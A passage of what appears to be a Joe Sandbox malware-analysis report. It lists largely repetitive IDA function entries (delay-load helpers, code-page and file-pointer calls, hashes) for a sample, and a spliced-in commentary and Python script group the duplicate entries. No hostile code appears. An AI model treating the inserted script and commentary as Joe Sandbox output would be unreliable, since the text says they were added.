                                                                                              • Opcode ID: d19974a8d1c359e1f2802d20bc8e5baf3e0ff41f7fd802058d9d3d56d2d47437
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: d19974a8d1c359e1f2802d20bc8e5baf3e0ff41f7fd802058d9d3d56d2d47437
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 6aec787217c4f83b00eb7bfdbaa2949db78949ed0002d2ed827cdcb807fa2733
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 6aec787217c4f83b00eb7bfdbaa2949db78949ed0002d2ed827cdcb807fa2733
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 87ad042eed76bff47b91e26ea67042eb76ee97f9f97e69d0b78882ded0b6f561
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 87ad042eed76bff47b91e26ea67042eb76ee97f9f97e69d0b78882ded0b6f561
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: d9b9dd08ba32aaa1bac5e9338c75c6d9c837649bbd80bca1997a38cf13d47b99
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: d9b9dd08ba32aaa1bac5e9338c75c6d9c837649bbd80bca1997a38cf13d47b99
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: 407d5b45297d13a4bf8f2a2e0f3a808fd3960a1622d17995a2ed722ae911ce95
                                                                                              • Instruction ID: 673788784031477a865c1c81b17a015ff38145b412ed599fbaac47098e89f92b
                                                                                              • Opcode Fuzzy Hash: 407d5b45297d13a4bf8f2a2e0f3a808fd3960a1622d17995a2ed722ae911ce95
                                                                                              • Instruction Fuzzy Hash: B4A011C2AA8200FC300822A02E0ACBB020CC0C0B2AB30A22EF800800C2A8880A280830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: abf3e51ddf96b9058c26c948dca5341cb1e12e0ed33523a902393f42e4635c21
                                                                                              • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                              • Opcode Fuzzy Hash: abf3e51ddf96b9058c26c948dca5341cb1e12e0ed33523a902393f42e4635c21
                                                                                              • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: 308c43f38c0d4f1e5253cae27ca6764f377ae88c979edcf59885b1af5e75735f
                                                                                              • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                              • Opcode Fuzzy Hash: 308c43f38c0d4f1e5253cae27ca6764f377ae88c979edcf59885b1af5e75735f
                                                                                              • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
                                                                                              • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                              • Opcode Fuzzy Hash: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
                                                                                              • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
                                                                                              • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                              • Opcode Fuzzy Hash: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
                                                                                              • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
                                                                                              • Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
                                                                                              • Opcode Fuzzy Hash: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
                                                                                              • Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
                                                                                              • Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
                                                                                              • Opcode Fuzzy Hash: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
                                                                                              • Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
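
The two delay-load entries above (Opcode IDs 736ae991... and c2be0905...) and the two after them (bc85d44e... and b9ace952...) each share an Instruction ID and an Instruction Fuzzy Hash while their Opcode IDs differ, so the same code is listed more than once. The script below, added here as an illustration and not part of the Joe Sandbox report or its tooling, parses entries in this layout, keeps each function's direct API calls (dropping the "Part of subcall function" lines), and groups entries by Instruction ID so such pairs surface once. The trimmed sample is built from the entries on this page; the regular expressions are my own assumption about the report's text layout.

```python
import re
from collections import defaultdict

# Constructed sample: five entries copied from the report above and trimmed to
# the fields this script reads ("Memory Dump Source", "Joe Sandbox IDA Plugin"
# and the section headers are dropped). IDs, hashes, call names and addresses
# are the report's own. The 736ae... entry's "APIs" block lies before the
# excerpt, so it has no call line here.
SAMPLE = """\
• ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDu<s
• Opcode ID: c2be0905137ce24624bfa9efb04f20bd29716ec93ccef637b50de2e57d81ba81
• Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
• Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
Uniqueness Score: -1.00%
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDu<s
• Opcode ID: 736ae9911c06b90f78c4bb291b7428f7fed3659cb45f2cf43e693535a0f93242
• Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
• Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
Uniqueness Score: -1.00%
• ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Fjuns
• Opcode ID: bc85d44ed585accb71ed9e5fc95ff3c1f80a379094c16e36aa2017505e50b318
• Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
• Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
Uniqueness Score: -1.00%
• ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Fjuns
• Opcode ID: b9ace9524d0d7482d18ed9a9e7149c0db7a019f26bb6a0322e59bac91d6f9b89
• Instruction ID: f241060a909f8a8dbc6e6e3c70435d4601ae270483e925a447f8d560710887ed
• Instruction Fuzzy Hash: E9A001D6AA9252FC310962A16E1ADBB025DC4C5B6AB31A92EF816854C2A8881A691871
Uniqueness Score: -1.00%
  • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0074BA89,?,00000000), ref: 0074BC64
• GetCPInfo.KERNEL32(00000000,0074BA89,?,?,?,0074BA89,?,00000000), ref: 0074BC77
• API ID: CodeInfoPageValid
• String ID:
• Opcode ID: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
• Instruction ID: b103f32d4360cbaba7d80a98e49fc41b5285a7f55890ebd7174dfc033e8e5156
• Instruction Fuzzy Hash: 7A512370E002459EDB248F75C8C56BABBF4EF41300F1844AED4968B262D73DEE458F90
Uniqueness Score: -1.00%
"""

# Bullet fields in the form "• Name: value" (assumed layout, see lead-in).
FIELD = re.compile(
    r"^\s*•\s*(Opcode ID|Instruction ID|Instruction Fuzzy Hash|API ID):[ \t]*(.*?)[ \t]*$",
    re.M,
)
# Direct call line: "• Name.Module(args), ref: ADDR" or "• Name.Module ref: ADDR".
# "Part of subcall function ..." lines belong to a callee one level down; skipped.
CALL = re.compile(
    r"^\s*•\s*(?!Part of subcall)(\S+?)(?:\(([^)]*)\))?,?\s+ref:\s*([0-9A-Fa-f]{8})\s*$",
    re.M,
)
ENTRY_END = re.compile(r"^\s*Uniqueness Score:.*$", re.M)


def parse_entries(text):
    """Return {opcode_id: entry}; chunks without an Opcode ID are skipped."""
    entries = {}
    for chunk in ENTRY_END.split(text):
        fields = dict(FIELD.findall(chunk))
        if "Opcode ID" not in fields:
            continue
        entries[fields["Opcode ID"]] = {
            "opcode_id": fields["Opcode ID"],
            "instruction_id": fields.get("Instruction ID", ""),
            "fuzzy_hash": fields.get("Instruction Fuzzy Hash", ""),
            "api_id": fields.get("API ID", ""),
            "calls": [(name, addr.upper()) for name, _args, addr in CALL.findall(chunk)],
        }
    return entries


def collapse_by_instruction_id(entries):
    """Group on Instruction ID; list the Opcode IDs per group and flag whether
    the group's Instruction Fuzzy Hash and API ID agree (they should)."""
    groups = defaultdict(list)
    for e in entries.values():
        groups[e["instruction_id"]].append(e)
    return {
        iid: {
            "opcode_ids": sorted(e["opcode_id"] for e in es),
            "consistent": len({(e["fuzzy_hash"], e["api_id"]) for e in es}) == 1,
        }
        for iid, es in groups.items()
    }


def duplicate_groups(entries):
    """Instruction IDs shared by more than one Opcode ID, i.e. code the report
    lists more than once, as in the two delay-load pairs above."""
    return {iid: g for iid, g in collapse_by_instruction_id(entries).items() if len(g["opcode_ids"]) > 1}
```

Running `duplicate_groups(parse_entries(SAMPLE))` returns the two Instruction IDs 8f506af1... and f241060a..., each with its two Opcode IDs, and leaves the GetCPInfo entry (b103f32d...) out; per-entry `calls` keep only the function's own call sites, so the GetOEMCP line reached through subcall 0074B7BB is not attributed to it.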

                                                                                              APIs
                                                                                                • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0074BA89,?,00000000), ref: 0074BC64
                                                                                              • GetCPInfo.KERNEL32(00000000,0074BA89,?,?,?,0074BA89,?,00000000), ref: 0074BC77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
                                                                                              • Instruction ID: b103f32d4360cbaba7d80a98e49fc41b5285a7f55890ebd7174dfc033e8e5156
                                                                                              • Opcode Fuzzy Hash: ecab868255bb0af639ec4e949942e9c6b4c117b148877fe0e001afcc079d839f
                                                                                              • Instruction Fuzzy Hash: 7A512370E002459EDB248F75C8C56BABBF4EF41300F1844AED4968B262D73DEE458F90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00729A50,?,?,00000000,?,?,00728CBC,?), ref: 00729BAB
                                                                                              • GetLastError.KERNEL32(?,00000000,00728411,-00009570,00000000,000007F3), ref: 00729BB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
